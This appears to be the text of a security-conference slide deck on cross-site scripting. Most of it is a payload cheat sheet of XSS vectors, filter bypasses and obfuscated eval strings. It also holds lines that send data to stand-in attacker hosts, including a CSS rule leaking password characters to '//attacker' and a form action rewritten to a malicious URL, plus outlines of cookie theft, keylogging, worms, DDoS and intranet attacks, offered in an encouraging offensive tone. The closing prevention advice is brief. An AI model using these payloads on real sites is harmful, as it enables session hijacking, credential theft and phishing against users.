XSS is more than a simple threat
Avădănei AndreiSoftware Developer, Blogger, Student
www.worldit.info
@AndreiAvadanei
#RoCyberCon @20 february
Introduction to XSS
Short story XSS types Shouts
Short story
XSS- it's a client side vulnerability
- … but can become a server side one
- based on Javascript injection
- … and HTML, Java, ActiveX, VBScript, Flash, JSON and so on
- is the second most popular threat in 2010 (via Infosec & OWASP)
- with many resources available on the Internet (use Google)
XSS Types
Non-persistent (reflected)
- the most common type of XSS injection
- requires server side interpretation of the query
- third-party required
Persistent (stored)
- the most dangerous type of XSS injection
- requires server side interpretation of the query and data storing
- third-party may not be required
Dom-based
- the newest type of XSS injection
- requires client side interpretation
- usually non-persistent
Shouts #1 – XSS Amazon
Shouts #2 XSS Facebook
Shouts #3 XSS Google
Shouts #4 XSS Ebay
Shouts #5 More XSS'ed
Twitter, MySpace, Hi5, Wordpress, Yahoo, Joomla, PhpBB, Drupal, e107, WorldIT.info, PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, Youtube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc. etc. etc. etc.
Getting XSS'ed
Where? Basic XSS'ing Advanced XSS'ing HTML 5 XSS'ed Bypass XSS protection
Where? everywhere
Rule : ”Do not trust in anything ever, especially when it comes to user input.” XSS vulnerabilities can be found in anything that came from user. GET, POST, COOKIE, FILES, SERVER and Headers are main targets. Try to be clever.
Basic XSS'ing
<script>alert(1)</script> //basic
“><script>alert(1)</script> //bypass a open tag
<!--<img src="--><img src=x onerror=alert(1)//"> //bypass & generate a error
“ onmouseover=”alert(1)” //all javascript events
alert(/XSS/.source) or alert( String(/Test/).substr(1,4) ); //some other simple vectors
<script>alert(String.fromCharCode(88,83,83));</script> //bypass quotes filters
<IMG SRC=javascript:alert('XSS')> //unicode injection; utf-8, hex, decimal or octal injection may work
<meta http-equiv="refresh" content="0;url=http://;javascript:..." // evasion
<style type=text/javascript>alert('xss')</style> //javascript injection based on style tag
“><img src=”x:x” onerror=”alert(0)”> // :D
[…]
Advanced XSS'ing
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> //background & unicode
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> //send IE into a loop
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> //xss in xml document
x='\x61\x6c\x65\x72\x74\x28\x31\x29'; new Function(x)(); //something different from every day injections
Function('a\x6cert(1)')();// ;)
x=eval,1,1,1;1; 1,1,1,b='\\',1,1,1; 1,1,1,s='\'',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + unicode injection
[...]
HTML 5 XSS'ed
- new technologies, new problems
<video onerror=”javascript:alert(1)”><source> //new tag
<audio onerror=”javascript:alert(1)”><source> //other new tag
<form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events
<div draggable=”true” ondragstart=”event.dataTransfer.setData('text/plain', 'Evil payload')”> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes
<input type="text" AUTOFOCUS onfocus=alert(1)>
<script>alert(localStorage.getItem('foo'))</script> //access local storage
“><script>(history.pushState({},”,'index.php'))(document.forms[0].action='http://maliciousURL')</script> //conceal the real location and replace it with anything we want. Ex : http://bit.ly/pushStateXSS
Bypass XSS protection
<img/src="mars.png"alt="mars"> //no white spaces, use / instead
<object data="javascript:alert(0)"> //avoid src
<isindex type=image src=1 onerror=alert(1)> //did you know isindex tag?
<img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass for error generation
location=location.hash.slice(1); //avoid the #
http://victim.com?param=";location=location.hash)//#0={};alert(0) //payload after the hash url, victim won't see true payload
alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results
""+{toString:alert} or ""+{valueOf:alert} //Executes function without using () or =
Future tricks in HTML 5
</a onmousemove="alert(1)"> //html 5 will support events in closed tags
<style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure xss-based XSS
data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg== //avoid using plain text/html value
?injection=<script+&injection=>alert(1)></script> //HPP, popular in SQLi
via BlackHat Conferences.
XSS Injection Exploitation (part 1)
Redirection Clickjacking URL Spoofing Session hijacking Cookie stuffing Ad Hijacking CSRF/XSRF attacks History stealling XSS Defacement Key & Mouse logging
Redirection & Clickjacking
Redirection redirect your victim, ex. document.location = ”http://www.your-evil-
site.com”;
you create fake traffic popularClickjacking describes one websites that poses as another. ex. : redirect victim to you onclick event calling used in phishing, gives high credibility extremely popular
URL Spoofing
popular in phishing the url is user friendly the web page content is hijacked and all
information are send to monitored websites by a thief
extremely popular
Session Hijacking
also known as ”Cookie Stealling” usually used with document.cookie help you to gain control over other logged session needs a cookie grabber for instance, XSS in *.yahoo.com can help you to
hijack Yahoo accounts extremely popular
Cookie stuffing
also known as cookie dropping used in blackhat online marketing generates illegitimate affiliate sellings by
hijacking cookies uses pop-ups, frames and iframes, images,
javascript, stylesheets or flash for accomplishing cookie dropping
popular
Ad Hijacking
used in blackhat online marketing usually requires persistent XSS you can modify ad scripts with your own, getting
paid when user clicks on hijacked ads popular
CSRF/XSRF attacks
unauthorized commands are transmited from an user that website trusts.
usually used along with <img src=””. for instance, if <img src=”http://victim.com/?do=logout” /> is
permanently injected and an user acces the page with malformated content, he will be forced to log out.
use your imagination, you can do more than that.
History Stealling You can find out what sites have been visited by the victim using
”getComputedStyle” like bellow, after you createad a node with CSS visited selector having a custom known color :
document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
rarely used, but still important it could be done using the full power of HTML 5
XSS Defacement
looks like server side defaced pages … but it's only a client side deface can create chaos and confusion when they are
used for hacking an website invoves changing the HTML content of the page of course, two types : persistent and non-
persistent persistent XSS deface are more dangerous than
no-persistent
Key & Mouse Logging
Keylogging - log all keystrokes and send remotely
- document.onkeypress / unsafeWindow.onkeypress events
- store keystrokes on a local variable and send them regular on a remote server
Mouse logging - log all mouse moves and send remotely
- document.onmousemove event
- dangerous but not so popular0
Tired?
You shouldn't, because this is only the beggining...
XSS Injection Exploitation(part 2)
Browser hijacking Port Scanning DDoS XSS Tunneling Distributed Password Cracking Worms (Spreading) Arbitrary file execution & Privilege escalation Intranet Hacking
Browser Hijacking Also known as Tab Hijacking. Highly recommended when hacker want a second shot on victims. XSS Shells usually do for you With iframe injection Working until the victim close the tab. The only drawback with this method is that the URL bar does not change with
each click, which may or may not be noticeable to the user.
Distributed port scanning Cross domain XMLHttpRequests and WebSockets for performing remote port
scanning, but using XSS you can do distributed remote port scanning Latest Firefox, Chrome or Safari supports already these new technolologies This option it's not available yet but it will in the next generation of XSS Shell Firefox & Safari time connection is less than 100 ms 1 victim – 65,000 scanned ports – 6,500 seconds 100 victims - 65,000 scanned ports – 6,5 seconds What about 1,000 or 10,000 victims?
DDoS Based on WebSockets Application-level DDoS attacks (layer 7 DDoS) Cross Origin Request (COR) are processed even if the site has restriction and
therefore the request will create a load on the server 1 minute – 1 browser – 10,000 requests / minute using COR WebWorkers with
GET requests 1 minute – 600 browser – over 100, 000 requests / minute can be enought to
shut down a target We should wait for upgrading the majority of the browsers in the world But blackhat teams will be prepared with amazing tools for DDoS
XSS Tunneling XSS Channel is an interactive communication channel between two systems
which is opened by an XSS attack. At technical level, it may be an Ajax application. Node.js and Comet Push can
make difference in the future XSS Shells. XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to
use virtually any application that supports HTTP proxies. XSS Tunnel is the standard HTTP proxy which sits on an attacker’s system. You can tunnel all your traffic throught a XSS Channel. You can build your own SSH-like protocol. You can forget about the user session problem when hijacking is not possible
because there is an IP adress restriction. Again, your imagination is the limit.
Distributed Password Cracking
Javascript engines are becoming verry fast. And we have WebWorkers. Password guessing rates in Javascript tools of 100,000 MD5 hashes/second. ~100 machines running the JavaScript distributed password cracking
program can match the cracking rate of one machine running a similar program written in native code.
But, in these days spreading methods are verry effective. Why not 10,000 compromised machines?
Ravan - a JavaScript distributed password cracker that uses HTML5 WebWorkers.
Perform password cracking in background JavaScript threads. Support salted MD5 and SHA hashes.
Worms (spreading) One of the most efficient environment for worm propagation - social
networking XSS Warhol Worm Linear XSS Worm Hydra XSS Worm Samy (2005) inffected over 1,000,000 users from MySace in 20 hours Yahoo!, Hi5, Twitter and Facebook could easily be next targets on a larger
scale. You can simply attach a trojan with your Worm and the risks of creating
permanent zombies are growing.
Arbitrary file execution In 2008 a vulnerability which affected the IE 7 & IE 8 could execute some
arbitrary files using some social engineering skills. During last years few other similar vulnerabilities appeard on Internet jungle. Still, a XSS vulnerability and a CSRF vulnerability in a administrator file editor,
which can be bypassed with XMLHttpRequest to the same origin requests an you have the right combination : a XSS vulnerability has become arbitrary code execution (privilege escalation).
What are you waiting for? Find the next one major privilege escalation vulnerability.
Intranet Hacking(part 1)
Web browsers can be completely controlled by any Web page, enabling them to become launching points to attack internal network resources. Why?
Intranet Hacking(part 2)
Exploit procedures : A victim visits a malicious Web page or clicks a nefarious link; embedded
JavaScript malware then assumes control over their Web browser. JavaScript malware loads a Java applet revealing the victim’s internal NAT IP
address. Then, using the victim’s Web browser as an attack platform, the JavaScript
malware identifies and fingerprints Web servers on the internal network. Attacks are initiated against internal or external Web sites, and compromised
information is sent outside the network for collection.
Intranet Hacking(part 3)
Collecting information : Obtaining NAT'ed IP Adress – MyAddress, a special Java Applet
Port scanning - <script src=http://ip/></script>
Blind Web Server Fingerprinting - explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting.
<img src="http://intranet_ip/unique_image_url" onerror="fingerprint()" />
Attack the intranet
- try different well-known vulnerabilities
- try hacking the web interface of DSL routers
- load local files using file:///
- get help from XSS Shells
Preventing XSS attacks
Filtering Input / Output encoding Web browser security
- select a safer browser (Chrome)- use a virtual machine for suspicious links- pay more attention to shortened urls- use plugins for better security (like NoScript)
XSS it's still a simple threat?
:)
Question?
Thanks. :)
Bibliography
Experience & Google.